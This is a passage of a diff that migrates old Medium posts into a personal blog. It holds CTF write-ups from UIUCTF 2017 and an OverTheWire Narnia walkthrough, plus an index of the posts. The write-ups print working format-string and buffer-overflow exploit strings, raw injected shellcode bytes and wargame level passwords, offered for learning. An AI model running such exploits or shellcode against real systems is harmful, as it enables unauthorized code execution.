199037898049081148054548566008626493558290050160287889209057083223407180156125399899465196611255722303390874101982934954388936179424024104549780651688160499201410108321518752502957346260593418668796624999582838387982430520095732090601546001755571395014548912727418182188910950322763678024849076083148030838828924108260083080562081253547377722180347372948445614953503124471116393560745613311509380885545728947236076476736881439654048388176520444109172092029548244462475513941506675855751026925250160078913809995564374674278235553349778352067191820570404315381746499936539482369231372882062307188454140330786512148310245052484671692280269741146507675933518321695623680547732771867757371698350343979932499637752314262246864787150534170586075473209768119198889190503283212208200005176410488476529948013610803040328568552414972234514746292014601094331465138374210925373263573292609023829742634966280579621843784216908520325876171463017051928049668240295956697023793952538148945070686999838223927548227156965116574566365108818752174755077045394837234760506722554542515056441166987424547451245495248956829984641868331576895415337336145024631773347254905002735757</pre>
|
||||||
|
<p name="2839" id="2839" class="graf graf--p graf-after--pre">Standard RSA challenge, we’re given N, e, and
|
||||||
|
c and we’re asked to find the original message… It’s supposed to be a “baby” RSA challenge, so one thing
|
||||||
|
that came to mind was that m^e is actually <em class="markup--em markup--p-em">less</em> than N. I put the
|
||||||
|
ciphertext c into factordb.com, and it turned out that it was a perfect fifth power! (recall that e=5).
|
||||||
|
The problem became trivial at this point; to get the flag, simply convert the fifth root of c back into
|
||||||
|
ASCII.</p>
|
||||||
|
<h3 name="d90e" id="d90e" class="graf graf--h3 graf-after--p">goodluck (200 points, pwn)</h3>
|
||||||
|
<p name="6b0f" id="6b0f" class="graf graf--p graf-after--h3">This challenge was pretty straightforward; once
|
||||||
|
I opened it in IDA, I noticed that it was <code class="markup--code markup--p-code">printf</code>’ing some
|
||||||
|
user-supplied input. I tried a bunch of values with the binary locally until I got the exploit string
|
||||||
|
<code class="markup--code markup--p-code">%9$s</code>, which prints the 9th string on the stack (which is
|
||||||
|
where <code class="markup--code markup--p-code">flag.txt</code> was read to).
|
||||||
|
</p>
|
||||||
|
<pre name="c548" id="c548"
|
||||||
|
class="graf graf--pre graf-after--p">michael@zhang:~$ echo “%9\$s” | nc challenge.uiuc.tf 11342 <br>what’s the flag <br>You answered: <br>flag{always_give_110%} <br>But that was totally wrong lol get rekt</pre>
|
||||||
|
<h3 name="62c9" id="62c9" class="graf graf--h3 graf-after--pre">LSLol — Log in, stay here (200 points,
|
||||||
|
reversing)</h3>
|
||||||
|
<p name="f237" id="f237" class="graf graf--p graf-after--h3">To be honest, I don’t even know how I solved
|
||||||
|
this one. I think I created an account and just tried a bunch of random stuff until I was at the location
|
||||||
|
indicated in the <code class="markup--code markup--p-code">X-SecondLife-Local-Position</code> header in
|
||||||
|
the URL I was given.</p>
|
||||||
|
<h3 name="5f73" id="5f73" class="graf graf--h3 graf-after--p">snekquiz (200 points, pwn)</h3>
|
||||||
|
<p name="4ea6" id="4ea6" class="graf graf--p graf-after--h3">In this challenge, we aren’t given a binary,
|
||||||
|
just a server to connect to. So we kind of have to imagine how it’s programmed. The server asks us 3
|
||||||
|
questions, then reveals us the answers so we can get all 3 right the next time. But we need a score of 5
|
||||||
|
to get the flag!</p>
|
||||||
|
<p name="05bc" id="05bc" class="graf graf--p graf-after--p">I imagine that the score variable must be in the
|
||||||
|
local scope of whatever function is doing the input loop. If that’s the case, we can definitely overwrite
|
||||||
|
it, since buffer length is not being checked. Apparently stack protector has been enabled so we won’t be
|
||||||
|
able to write out of the stack frame, but that doesn’t really matter since we aren’t even given a binary
|
||||||
|
to work with.</p>
|
||||||
|
<p name="e0ba" id="e0ba" class="graf graf--p graf-after--p">After trying a bunch of values, I got that 88
|
||||||
|
was the maximum number of <code class="markup--code markup--p-code">A</code>s I was allowed to send to the
|
||||||
|
server before I started writing over the canary. I got a message that looked like this:</p>
|
||||||
|
<pre name="d225" id="d225"
|
||||||
|
class="graf graf--pre graf-after--p">Score greater than 5 detected! You must be cheating with a score like 1094795585</pre>
|
||||||
|
<p name="0858" id="0858" class="graf graf--p graf-after--pre graf--trailing">(for reference, that number is
|
||||||
|
0x41414141). That means score is being scored in an int. This time, I sent <code
|
||||||
|
class="markup--code markup--p-code">\x05\x00\x00\x00</code> 22 times, hoping that it would overwrite the
|
||||||
|
score variable with the exact value of 5, and it did!</p>
|
||||||
|
</div>
|
||||||
|
</div>
|
||||||
|
</section>
|
||||||
|
</section>
|
||||||
|
<footer>
|
||||||
|
<p>By <a href="https://medium.com/@failedxyz" class="p-author h-card">Michael Zhang</a> on <a
|
||||||
|
href="https://medium.com/p/a53aabe1bc56"><time class="dt-published" datetime="2017-05-01T00:09:47.978Z">May 1,
|
||||||
|
2017</time></a>.</p>
|
||||||
|
<p><a href="https://medium.com/@failedxyz/uiuctf-2017-writeups-a53aabe1bc56" class="p-canonical">Canonical
|
||||||
|
link</a></p>
|
||||||
|
<p>Exported from <a href="https://medium.com">Medium</a> on October 8, 2024.</p>
|
||||||
|
</footer>
|
||||||
|
</article>
|
41
src/content/posts/2017-05-24_OverTheWire--Narnia.md
Normal file
41
src/content/posts/2017-05-24_OverTheWire--Narnia.md
Normal file
|
@ -0,0 +1,41 @@
|
||||||
|
---
|
||||||
|
title: "OverTheWire: Narnia"
|
||||||
|
date: 2017-05-24T03:10:36.500Z
|
||||||
|
tags: [medium-blog]
|
||||||
|
---
|
||||||
|
|
||||||
|
<article class="h-entry">
|
||||||
|
<section data-field="body" class="e-content">
|
||||||
|
<section name="6f76" class="section section--body section--first section--last">
|
||||||
|
<div class="section-content">
|
||||||
|
<div class="section-inner sectionLayout--insetColumn">
|
||||||
|
<h3 name="1811" id="1811" class="graf graf--h3 graf-after--h3">Level 0: Simple Buffer Overflow</h3>
|
||||||
|
<p name="0218" id="0218" class="graf graf--p graf-after--h3">We’re given a buffer of 20 characters and an
|
||||||
|
int. The program reads 24 characters from input, exactly overwriting the int. The exploit code:</p>
|
||||||
|
<pre name="47f8" id="47f8"
|
||||||
|
class="graf graf--pre graf-after--p">(python -c ‘print “\xef\xbe\xad\xde” * 6’; cat) | ./narnia0</pre>
|
||||||
|
<p name="b867" id="b867" class="graf graf--p graf-after--pre">The password for level 1 is <code
|
||||||
|
class="markup--code markup--p-code">efeidiedae</code>.</p>
|
||||||
|
<h3 name="59e6" id="59e6" class="graf graf--h3 graf-after--p">Level 1: Executing Shellcode</h3>
|
||||||
|
<p name="d660" id="d660" class="graf graf--p graf-after--h3">The program we’re given will execute anything
|
||||||
|
at the environment variable <code class="markup--code markup--p-code">EGG</code> as a function pointer; I
|
||||||
|
found some shellcode from google and it worked. The exploit code:</p>
|
||||||
|
<pre name="a253" id="a253"
|
||||||
|
class="graf graf--pre graf-after--p">EGG=$(printf “\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\x<br>ff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81”) bash -c ‘./narnia1’</pre>
|
||||||
|
<p name="5af8" id="5af8" class="graf graf--p graf-after--pre">The password for level 2 is <code
|
||||||
|
class="markup--code markup--p-code">nairiepecu</code>.</p>
|
||||||
|
<p name="3a3b" id="3a3b" class="graf graf--p graf-after--p">Level 2</p>
|
||||||
|
<p name="ce56" id="ce56" class="graf graf--p graf-after--p graf--trailing">soon lol</p>
|
||||||
|
</div>
|
||||||
|
</div>
|
||||||
|
</section>
|
||||||
|
</section>
|
||||||
|
<footer>
|
||||||
|
<p>By <a href="https://medium.com/@failedxyz" class="p-author h-card">Michael Zhang</a> on <a
|
||||||
|
href="https://medium.com/p/a282ef43b705"><time class="dt-published" datetime="2017-05-24T03:10:36.500Z">May
|
||||||
|
24, 2017</time></a>.</p>
|
||||||
|
<p><a href="https://medium.com/@failedxyz/overthewire-narnia-a282ef43b705" class="p-canonical">Canonical link</a>
|
||||||
|
</p>
|
||||||
|
<p>Exported from <a href="https://medium.com">Medium</a> on October 8, 2024.</p>
|
||||||
|
</footer>
|
||||||
|
</article>
|
37
src/content/posts/2024-10-07-old-blog-posts.md
Normal file
37
src/content/posts/2024-10-07-old-blog-posts.md
Normal file
|
@ -0,0 +1,37 @@
|
||||||
|
---
|
||||||
|
title: Old blog posts
|
||||||
|
date: 2024-10-07T22:40:16-05:00
|
||||||
|
tags: [life, medium-blog]
|
||||||
|
---
|
||||||
|
|
||||||
|
Just re-discovered an [old blog][1] I had written over at Medium from back around 2017.
|
||||||
|
|
||||||
|
[1]: https://medium.com/michaels-blog
|
||||||
|
|
||||||
|
For completeness' sake I migrated them over to this blog, while still keeping links to the originals.
|
||||||
|
This means I've been blogging for almost 10 years in total!
|
||||||
|
|
||||||
|
I'm grateful that Medium was able to keep this around for all this time.
|
||||||
|
Even though some of it is quite embarassing to look back at, it's kind of like peering into a time capsule and seeing what I was up to in the past.
|
||||||
|
|
||||||
|
I'm also really glad I did a post-mortem of at least one iteration of EasyCTF, since I had stupidly lost all of the actual competition data :frown:
|
||||||
|
|
||||||
|
Here are the links to the old posts:
|
||||||
|
|
||||||
|
- [`[2017-05-24]` OverTheWire: Narnia](/posts/2017-05-24_overthewire--narnia/)
|
||||||
|
- [`[2017-05-01]` UIUCTF 2017 Writeups](/posts/2017-05-01_uiuctf-2017-writeups/)
|
||||||
|
- [`[2017-03-26]` VolgaCTF 2017 Writeups](/posts/2017-03-26_volgactf-2017-writeups/)
|
||||||
|
- [`[2017-03-24]` EasyCTF 2017 Wrap-up](/posts/2017-03-24_easyctf-2017-wrap-up/)
|
||||||
|
- [`[2017-02-16]` So, you can detect whether I use an ad-blocker or not, eh?](/posts/2017-02-16_so--you-can-detect-whether-i-use-an-ad-blocker-or-not--eh/)
|
||||||
|
- [`[2017-01-14]` Why I think HTML is a programming language.](/posts/2017-01-14_why-i-think-html-is-a-programming-language/)
|
||||||
|
- [`[2017-01-07]` Watch out, returning users!](/posts/2017-01-07_watch-out--returning-users/)
|
||||||
|
- [`[2017-01-03]` Wi-Fi Problems when Installing Linux on ASUS machines.](/posts/2017-01-03_wi-fi-problems-when-installing-linux-on-asus-machines/)
|
||||||
|
- [`[2016-12-30]` XinIRC development.](/posts/2016-12-30_xinirc-development/)
|
||||||
|
- [`[2016-12-01]` Lightning Speed Run.](/posts/2016-12-01_lightning-speed-run/)
|
||||||
|
- [`[2016-10-02]` H4CK1T CTF 2016.](/posts/2016-10-02_h4ck1t-ctf-2016/)
|
||||||
|
- [`[2016-09-18]` CSAW CTF 2016 Quals.](/posts/2016-09-18_csaw-ctf-2016-quals/)
|
||||||
|
- [`[2016-09-07]` So. I started a blog.](/posts/2016-09-07_so--i-started-a-blog/)
|
||||||
|
- [`[2015-10-20]` Pwnable.kr: fd (1).](/posts/2015-10-20_pwnable-kr--fd--1/)
|
||||||
|
- [`[2015-03-19]` A Much-Needed Apology.](/posts/2015-03-19_a-much-needed-apology/)
|
||||||
|
- [`[2014-12-18]` How to accomplish something.](/posts/2014-12-28_how-to-accomplish-something/)
|
||||||
|
|
Loading…
Reference in a new issue